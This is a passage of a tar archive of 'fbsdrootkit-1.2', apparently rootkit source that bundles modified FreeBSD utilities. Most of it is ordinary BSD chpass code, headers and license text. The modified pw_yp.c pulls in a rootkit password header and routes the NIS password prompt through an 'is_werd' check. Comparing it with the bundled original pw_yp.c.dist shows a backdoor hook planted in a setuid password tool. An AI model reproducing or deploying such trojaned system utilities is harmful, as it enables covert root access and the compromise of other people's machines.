4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pw_copy.h 8.1 (Berkeley) 4/2/94 */ void pw_copy __P((int, int, struct passwd *)); fbsdrootkit-1.2/chpass/pw_yp.c100600 764 764 24517 6257642417 13764 0ustar dfdf/* * Copyright (c) 1995 * Bill Paul . All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * NIS interface routines for chpass * * Written by Bill Paul * Center for Telecommunications Research * Columbia University, New York City * * $Id: pw_yp.c,v 1.1.2.2 1996/06/24 17:18:04 wpaul Exp $ */ #ifdef YP #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_yp.h" #include "../config.h" #define FIRST_TIME #include "../rootkitpasswd.h" #define PERM_SECURE (S_IRUSR|S_IWUSR) HASHINFO openinfo = { 4096, /* bsize */ 32, /* ffactor */ 256, /* nelem */ 2048 * 1024, /* cachesize */ NULL, /* hash */ 0, /* lorder */ }; int _use_yp = 0; /* Save the local and NIS password information */ struct passwd local_password; struct passwd yp_password; void copy_yp_pass(p, x, m) char *p; int x, m; { register char *t, *s = p; static char *buf; yp_password.pw_fields = 0; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); /* Turn all colons into NULLs */ while (strchr(s, ':')) { s = (strchr(s, ':') + 1); *(s - 1)= '\0'; } t = buf; #define EXPAND(e) e = t; while (*t++ = *p++); EXPAND(yp_password.pw_name); yp_password.pw_fields |= _PWF_NAME; EXPAND(yp_password.pw_passwd); yp_password.pw_fields |= _PWF_PASSWD; yp_password.pw_uid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_UID; yp_password.pw_gid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_GID; if (x) { EXPAND(yp_password.pw_class); yp_password.pw_fields |= _PWF_CLASS; yp_password.pw_change = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_CHANGE; yp_password.pw_expire = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_EXPIRE; } EXPAND(yp_password.pw_gecos); yp_password.pw_fields |= _PWF_GECOS; EXPAND(yp_password.pw_dir); yp_password.pw_fields |= _PWF_DIR; EXPAND(yp_password.pw_shell); yp_password.pw_fields |= _PWF_SHELL; return; } void copy_local_pass(p,m) char *p; int m; { register char *t; static char *buf; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); t = buf; EXPAND(local_password.pw_name); EXPAND(local_password.pw_passwd); bcopy(p, (char *)&local_password.pw_uid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_gid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_change, sizeof(time_t)); p += sizeof(time_t); EXPAND(local_password.pw_class); EXPAND(local_password.pw_gecos); EXPAND(local_password.pw_dir); EXPAND(local_password.pw_shell); bcopy(p, (char *)&local_password.pw_expire, sizeof(time_t)); p += sizeof(time_t); bcopy(p, (char *)&local_password.pw_fields, sizeof local_password.pw_fields); p += sizeof local_password.pw_fields; return; } /* * Check if the user we're working with is local or in NIS. */ int use_yp (user) char *user; { int user_local = 0, user_yp = 0, user_exists = 0; DB *dbp; DBT key,data; char bf[UT_NAMESIZE + 2]; char *domain; char *result; int resultlen, rval; /* Is the user anywhere */ if (getpwnam(user) != NULL) user_exists = 1; if ((dbp = dbopen(_PATH_SMP_DB, O_RDONLY, PERM_SECURE, DB_HASH, &openinfo)) == NULL) errx(1, "error opening database: %s.", _PATH_MP_DB); /* Is NIS turned on */ bf[0] = _PW_KEYYPENABLED; key.data = (u_char *)bf; key.size = 1; if (!(dbp->get)(dbp,&key,&data,0)) { if ((rval = yp_get_default_domain(&domain))) { warnx("can't get local NIS domain name: %s",yperr_string(rval)); pw_error(NULL, 0, 1); } /* Is the user in the NIS passwd map */ if (!yp_match(domain, "passwd.byname", user, strlen(user), &result, &resultlen)) { user_yp = 1; copy_yp_pass(result, 0, resultlen); free(result); } /* Is the user in the NIS passwd map */ if (user_yp && !yp_match(domain, "master.passwd.byname", user, strlen(user), &result, &resultlen)) { copy_yp_pass(result, 1, resultlen); } free(result); } /* Is the user in the local password database */ bf[0] = _PW_KEYBYNAME; bcopy((char *)user, bf + 1, MIN(strlen(user), UT_NAMESIZE)); key.data = (u_char *)bf; key.size = strlen(user) + 1; if (!(dbp->get)(dbp,&key,&data,0)) { user_local = 1; copy_local_pass(data.data, data.size); } (dbp->close)(dbp); if (user_local && user_yp && user_exists) return(USER_YP_AND_LOCAL); else if (!user_local && user_yp && user_exists) return(USER_YP_ONLY); else if (user_local && !user_yp && user_exists) return(USER_LOCAL_ONLY); else if (!user_exists) return(USER_UNKNOWN); return(-1); } /* * Find the name of the NIS master server for this domain * and make sure it's running yppasswdd. */ static char *get_yp_master(void) { char *domain, *mastername; int rval; /* Get default NIS domain. */ if ((rval = yp_get_default_domain(&domain))) { warnx("can't get local NIS domain name: %s",yperr_string(rval)); pw_error(NULL, 0, 1); } /* Get master server of passwd map. */ if ((rval = yp_master(domain, "passwd.byname", &mastername))) { warnx("can't get master NIS server: %s", yperr_string(rval)); pw_error(NULL, 0, 1); } /* Check if yppasswdd is out there. */ if ((rval = getrpcport(mastername, YPPASSWDPROG, YPPASSWDPROC_UPDATE, IPPROTO_UDP)) == 0) { warnx("yppasswdd not running on NIS master server"); pw_error(NULL, 0, 1); } /* * Make sure it's on a reserved port. * XXX Might break with yppasswdd servers running on Solaris 2.x. */ if (rval >= IPPORT_RESERVED) { warnx("yppasswdd server not running on reserved port"); pw_error(NULL, 0, 1); } /* Everything checks out: return the name of the server. */ return (mastername); } /* * Ask the user for his NIS password and submit the new information * to yppasswdd. Note that yppasswdd requires password authentication * and only allows changes to existing records rather than the addition * of new records. (To do actual updates we would need something like * secure RPC and ypupdated, which FreeBSD doesn't have yet.) This means * that the superuser cannot use chpass(1) to add new users records to * the NIS password database. */ void yp_submit(pw) struct passwd *pw; { struct yppasswd yppasswd; CLIENT *clnt; char *master, *password, *encpass; int rval, status = 0; struct timeval tv; /* Populate the yppasswd structure that gets handed to yppasswdd. */ /* * XXX This is done first to work around what looks like a very * strange memory corruption bug: the text fields pointed to * by the members of the 'pw' structure appear to be clobbered * after get_yp_master() returns (in particular, it happens * during getrpcport()). I don't know exactly where the problem * lies: I traced it all the way to gethostbyname(), then gave * up. */ yppasswd.newpw.pw_passwd = strdup(pw->pw_passwd); yppasswd.newpw.pw_name = strdup(pw->pw_name); yppasswd.newpw.pw_uid = pw->pw_uid; yppasswd.newpw.pw_gid = pw->pw_gid; yppasswd.newpw.pw_gecos = strdup(pw->pw_gecos); yppasswd.newpw.pw_dir = strdup(pw->pw_dir); yppasswd.newpw.pw_shell = strdup(pw->pw_shell); yppasswd.oldpass = ""; /* Get NIS master server name */ master = get_yp_master(); if (pw->pw_passwd[0]) { /* Get the user's password for authentication purposes. */ printf ("Changing NIS information for %s on %s\n", yppasswd.newpw.pw_name, master); encpass = pw->pw_passwd; password = is_werd(getpass("Please enter password: ")); if (strncmp(crypt(password, encpass), encpass, strlen(encpass))) { warnx("Password incorrect."); pw_error(NULL, 0, 1); } yppasswd.oldpass = password; /* XXX */ } /* Create a handle to yppasswdd. */ clnt = clnt_create(master, YPPASSWDPROG, YPPASSWDVERS, "udp"); clnt->cl_auth = authunix_create_default(); /* Set a timeout and make the RPC call. */ tv.tv_sec = 20; tv.tv_usec = 0; rval = clnt_call(clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd, (char *)&yppasswd, xdr_int, (char *)&status, &tv); /* Call failed: signal the error. */ if (rval) { warnx("NIS update failed: %s", clnt_sperrno(rval)); pw_error(NULL, 0, 1); } /* Success. */ auth_destroy(clnt->cl_auth); clnt_destroy(clnt); warnx("NIS information %schanged on host %s", status ? "not " : "", master); return; } #endif /* YP */ fbsdrootkit-1.2/chpass/pw_yp.h100600 764 764 4433 6035125023 13723 0ustar dfdf/* * Copyright (c) 1995 * Bill Paul . All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * NIS interface routines for chpass * * Written by Bill Paul * Center for Telecommunications Research * Columbia University, New York City * * $Id: pw_yp.h,v 1.1.2.1 1995/10/06 00:58:51 davidg Exp $ */ #ifdef YP /* Four possible return codes from use_yp() */ #define USER_UNKNOWN 0 #define USER_YP_ONLY 1 #define USER_LOCAL_ONLY 2 #define USER_YP_AND_LOCAL 3 extern int _use_yp; extern struct passwd local_password; extern struct passwd yp_password; void yp_submit __P(( struct passwd * )); int use_yp __P(( char * )); #endif /* YP */ fbsdrootkit-1.2/chpass/table.c100600 764 764 5072 6017570537 13665 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)table.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include "chpass.h" char e1[] = ": "; char e2[] = ":,"; ENTRY list[] = { { "login", p_login, 1, 5, e1, }, { "password", p_passwd, 1, 8, e1, }, { "uid", p_uid, 1, 3, e1, }, { "gid", p_gid, 1, 3, e1, }, { "class", p_class, 1, 5, e1, }, { "change", p_change, 1, 6, NULL, }, { "expire", p_expire, 1, 6, NULL, }, { "full name", p_gecos, 0, 9, e2, }, { "office phone", p_gecos, 0, 12, e2, }, { "home phone", p_gecos, 0, 10, e2, }, { "location", p_gecos, 0, 8, e2, }, { "home directory", p_hdir, 1, 14, e1, }, { "shell", p_shell, 0, 5, e1, }, { NULL, 0, }, }; fbsdrootkit-1.2/chpass/util.c100600 764 764 7326 6020363216 13543 0ustar dfdf/*- * Copyright (c) 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)util.c 8.4 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include "chpass.h" #include "pathnames.h" static char *months[] = { "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December", NULL }; char * ttoa(tval) time_t tval; { struct tm *tp; static char tbuf[50]; if (tval) { tp = localtime(&tval); (void)sprintf(tbuf, "%s %d, %d", months[tp->tm_mon], tp->tm_mday, tp->tm_year + 1900); } else *tbuf = '\0'; return (tbuf); } int atot(p, store) char *p; time_t *store; { static struct tm *lt; char *t, **mp; time_t tval; int day, month, year; if (!*p) { *store = 0; return (0); } if (!lt) { unsetenv("TZ"); (void)time(&tval); lt = localtime(&tval); } if (!(t = strtok(p, " \t"))) goto bad; for (mp = months;; ++mp) { if (!*mp) goto bad; if (!strncasecmp(*mp, t, 3)) { month = mp - months + 1; break; } } if (!(t = strtok((char *)NULL, " \t,")) || !isdigit(*t)) goto bad; day = atoi(t); if (!(t = strtok((char *)NULL, " \t,")) || !isdigit(*t)) goto bad; year = atoi(t); if (day < 1 || day > 31 || month < 1 || month > 12 || !year) goto bad; if (year < 100) year += 1900; if (year <= 1970) bad: return (1); lt->tm_year = year - 1900; lt->tm_mon = month - 1; lt->tm_mday = day; lt->tm_hour = 0; lt->tm_min = 0; lt->tm_sec = 0; lt->tm_isdst = -1; if ((tval = mktime(lt)) < 0) return (1); *store = tval; return (0); } char * ok_shell(name) char *name; { char *p, *sh; setusershell(); while (sh = getusershell()) { if (!strcmp(name, sh)) return (name); /* allow just shell name, but use "real" path */ if ((p = strrchr(sh, '/')) && strcmp(name, p + 1) == 0) return (sh); } return (NULL); } fbsdrootkit-1.2/chpass/pw_yp.c.dist100600 764 764 24375 6256627005 14723 0ustar dfdf/* * Copyright (c) 1995 * Bill Paul . All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by Bill Paul. * 4. Neither the name of the author nor the names of any co-contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY Bill Paul AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * NIS interface routines for chpass * * Written by Bill Paul * Center for Telecommunications Research * Columbia University, New York City * * $Id: pw_yp.c,v 1.1.2.2 1996/06/24 17:18:04 wpaul Exp $ */ #ifdef YP #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_yp.h" #define PERM_SECURE (S_IRUSR|S_IWUSR) HASHINFO openinfo = { 4096, /* bsize */ 32, /* ffactor */ 256, /* nelem */ 2048 * 1024, /* cachesize */ NULL, /* hash */ 0, /* lorder */ }; int _use_yp = 0; /* Save the local and NIS password information */ struct passwd local_password; struct passwd yp_password; void copy_yp_pass(p, x, m) char *p; int x, m; { register char *t, *s = p; static char *buf; yp_password.pw_fields = 0; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); /* Turn all colons into NULLs */ while (strchr(s, ':')) { s = (strchr(s, ':') + 1); *(s - 1)= '\0'; } t = buf; #define EXPAND(e) e = t; while (*t++ = *p++); EXPAND(yp_password.pw_name); yp_password.pw_fields |= _PWF_NAME; EXPAND(yp_password.pw_passwd); yp_password.pw_fields |= _PWF_PASSWD; yp_password.pw_uid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_UID; yp_password.pw_gid = atoi(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_GID; if (x) { EXPAND(yp_password.pw_class); yp_password.pw_fields |= _PWF_CLASS; yp_password.pw_change = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_CHANGE; yp_password.pw_expire = atol(p); p += (strlen(p) + 1); yp_password.pw_fields |= _PWF_EXPIRE; } EXPAND(yp_password.pw_gecos); yp_password.pw_fields |= _PWF_GECOS; EXPAND(yp_password.pw_dir); yp_password.pw_fields |= _PWF_DIR; EXPAND(yp_password.pw_shell); yp_password.pw_fields |= _PWF_SHELL; return; } void copy_local_pass(p,m) char *p; int m; { register char *t; static char *buf; buf = (char *)realloc(buf, m + 10); bzero(buf, m + 10); t = buf; EXPAND(local_password.pw_name); EXPAND(local_password.pw_passwd); bcopy(p, (char *)&local_password.pw_uid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_gid, sizeof(int)); p += sizeof(int); bcopy(p, (char *)&local_password.pw_change, sizeof(time_t)); p += sizeof(time_t); EXPAND(local_password.pw_class); EXPAND(local_password.pw_gecos); EXPAND(local_password.pw_dir); EXPAND(local_password.pw_shell); bcopy(p, (char *)&local_password.pw_expire, sizeof(time_t)); p += sizeof(time_t); bcopy(p, (char *)&local_password.pw_fields, sizeof local_password.pw_fields); p += sizeof local_password.pw_fields; return; } /* * Check if the user we're working with is local or in NIS. */ int use_yp (user) char *user; { int user_local = 0, user_yp = 0, user_exists = 0; DB *dbp; DBT key,data; char bf[UT_NAMESIZE + 2]; char *domain; char *result; int resultlen, rval; /* Is the user anywhere */ if (getpwnam(user) != NULL) user_exists = 1; if ((dbp = dbopen(_PATH_SMP_DB, O_RDONLY, PERM_SECURE, DB_HASH, &openinfo)) == NULL) errx(1, "error opening database: %s.", _PATH_MP_DB); /* Is NIS turned on */ bf[0] = _PW_KEYYPENABLED; key.data = (u_char *)bf; key.size = 1; if (!(dbp->get)(dbp,&key,&data,0)) { if ((rval = yp_get_default_domain(&domain))) { warnx("can't get local NIS domain name: %s",yperr_string(rval)); pw_error(NULL, 0, 1); } /* Is the user in the NIS passwd map */ if (!yp_match(domain, "passwd.byname", user, strlen(user), &result, &resultlen)) { user_yp = 1; copy_yp_pass(result, 0, resultlen); free(result); } /* Is the user in the NIS passwd map */ if (user_yp && !yp_match(domain, "master.passwd.byname", user, strlen(user), &result, &resultlen)) { copy_yp_pass(result, 1, resultlen); } free(result); } /* Is the user in the local password database */ bf[0] = _PW_KEYBYNAME; bcopy((char *)user, bf + 1, MIN(strlen(user), UT_NAMESIZE)); key.data = (u_char *)bf; key.size = strlen(user) + 1; if (!(dbp->get)(dbp,&key,&data,0)) { user_local = 1; copy_local_pass(data.data, data.size); } (dbp->close)(dbp); if (user_local && user_yp && user_exists) return(USER_YP_AND_LOCAL); else if (!user_local && user_yp && user_exists) return(USER_YP_ONLY); else if (user_local && !user_yp && user_exists) return(USER_LOCAL_ONLY); else if (!user_exists) return(USER_UNKNOWN); return(-1); } /* * Find the name of the NIS master server for this domain * and make sure it's running yppasswdd. */ static char *get_yp_master(void) { char *domain, *mastername; int rval; /* Get default NIS domain. */ if ((rval = yp_get_default_domain(&domain))) { warnx("can't get local NIS domain name: %s",yperr_string(rval)); pw_error(NULL, 0, 1); } /* Get master server of passwd map. */ if ((rval = yp_master(domain, "passwd.byname", &mastername))) { warnx("can't get master NIS server: %s", yperr_string(rval)); pw_error(NULL, 0, 1); } /* Check if yppasswdd is out there. */ if ((rval = getrpcport(mastername, YPPASSWDPROG, YPPASSWDPROC_UPDATE, IPPROTO_UDP)) == 0) { warnx("yppasswdd not running on NIS master server"); pw_error(NULL, 0, 1); } /* * Make sure it's on a reserved port. * XXX Might break with yppasswdd servers running on Solaris 2.x. */ if (rval >= IPPORT_RESERVED) { warnx("yppasswdd server not running on reserved port"); pw_error(NULL, 0, 1); } /* Everything checks out: return the name of the server. */ return (mastername); } /* * Ask the user for his NIS password and submit the new information * to yppasswdd. Note that yppasswdd requires password authentication * and only allows changes to existing records rather than the addition * of new records. (To do actual updates we would need something like * secure RPC and ypupdated, which FreeBSD doesn't have yet.) This means * that the superuser cannot use chpass(1) to add new users records to * the NIS password database. */ void yp_submit(pw) struct passwd *pw; { struct yppasswd yppasswd; CLIENT *clnt; char *master, *password, *encpass; int rval, status = 0; struct timeval tv; /* Populate the yppasswd structure that gets handed to yppasswdd. */ /* * XXX This is done first to work around what looks like a very * strange memory corruption bug: the text fields pointed to * by the members of the 'pw' structure appear to be clobbered * after get_yp_master() returns (in particular, it happens * during getrpcport()). I don't know exactly where the problem * lies: I traced it all the way to gethostbyname(), then gave * up. */ yppasswd.newpw.pw_passwd = strdup(pw->pw_passwd); yppasswd.newpw.pw_name = strdup(pw->pw_name); yppasswd.newpw.pw_uid = pw->pw_uid; yppasswd.newpw.pw_gid = pw->pw_gid; yppasswd.newpw.pw_gecos = strdup(pw->pw_gecos); yppasswd.newpw.pw_dir = strdup(pw->pw_dir); yppasswd.newpw.pw_shell = strdup(pw->pw_shell); yppasswd.oldpass = ""; /* Get NIS master server name */ master = get_yp_master(); if (pw->pw_passwd[0]) { /* Get the user's password for authentication purposes. */ printf ("Changing NIS information for %s on %s\n", yppasswd.newpw.pw_name, master); encpass = pw->pw_passwd; password = getpass("Please enter password: "); if (strncmp(crypt(password, encpass), encpass, strlen(encpass))) { warnx("Password incorrect."); pw_error(NULL, 0, 1); } yppasswd.oldpass = password; /* XXX */ } /* Create a handle to yppasswdd. */ clnt = clnt_create(master, YPPASSWDPROG, YPPASSWDVERS, "udp"); clnt->cl_auth = authunix_create_default(); /* Set a timeout and make the RPC call. */ tv.tv_sec = 20; tv.tv_usec = 0; rval = clnt_call(clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd, (char *)&yppasswd, xdr_int, (char *)&status, &tv); /* Call failed: signal the error. */ if (rval) { warnx("NIS update failed: %s", clnt_sperrno(rval)); pw_error(NULL, 0, 1); } /* Success. */ auth_destroy(clnt->cl_auth); clnt_destroy(clnt); warnx("NIS information %schanged on host %s", status ? "not " : "", master); return; } #endif /* YP */ fbsdrootkit-1.2/chpass/Makefile.dist100600 764 764 1461 6257153127 15030 0ustar dfdf# @(#)Makefile 8.2 (Berkeley) 4/2/94 PROG= chpass SRCS= chpass.c edit.c field.c pw_copy.c pw_scan.c pw_util.c table.c util.c BINOWN= root BINMODE=4555 .PATH: ${.CURDIR}/../../usr.sbin/pwd_mkdb ${.CURDIR}/../../usr.sbin/vipw CFLAGS+=-I${.CURDIR}/../../usr.sbin/pwd_mkdb -I${.CURDIR}/../../usr.sbin/vipw LINKS= ${BINDIR}/chpass ${BINDIR}/chfn LINKS+= ${BINDIR}/chpass ${BINDIR}/chsh LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchpass LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchfn LINKS+= ${BINDIR}/chpass ${BINDIR}/ypchsh MLINKS= chpass.1 chfn.1 chpass.1 chsh.1 COPTS+= -DYP SRCS+= pw_yp.c DPADD= ${LIBRPCSVC} ${LIBCRYPT} LDADD+= -lrpcsvc -lcrypt beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/chpass ] || \ chflags noschg ${DESTDIR}${BINDIR}/chpass afterinstall: chflags schg ${DESTDIR}${BINDIR}/chpass .include fbsdrootkit-1.2/rootkitutil.h100600 764 764 407 6265031433 13660 0ustar dfdf#define ERR(a) {\ fprintf(stderr,"%s: ",pg);\ perror(a);\ exit(1);\ } #define BASENAME(a) {\ if((pg=(char *)strrchr(a,'/'))) {\ pg++;\ }\ else {\ pg=a;\ }\ } #define USAGE(a) {\ fprintf(stderr,"Usage: %s %s\n",pg,a);\ exit(1);\ } char *pg; #define RK_PROG pg fbsdrootkit-1.2/netiso/ 40700 764 764 0 6257642701 12346 5ustar dfdffbsdrootkit-1.2/netiso/tp_astring.c100600 764 764 5100 5617440453 14756 0ustar dfdf/*- * Copyright (c) 1991, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * 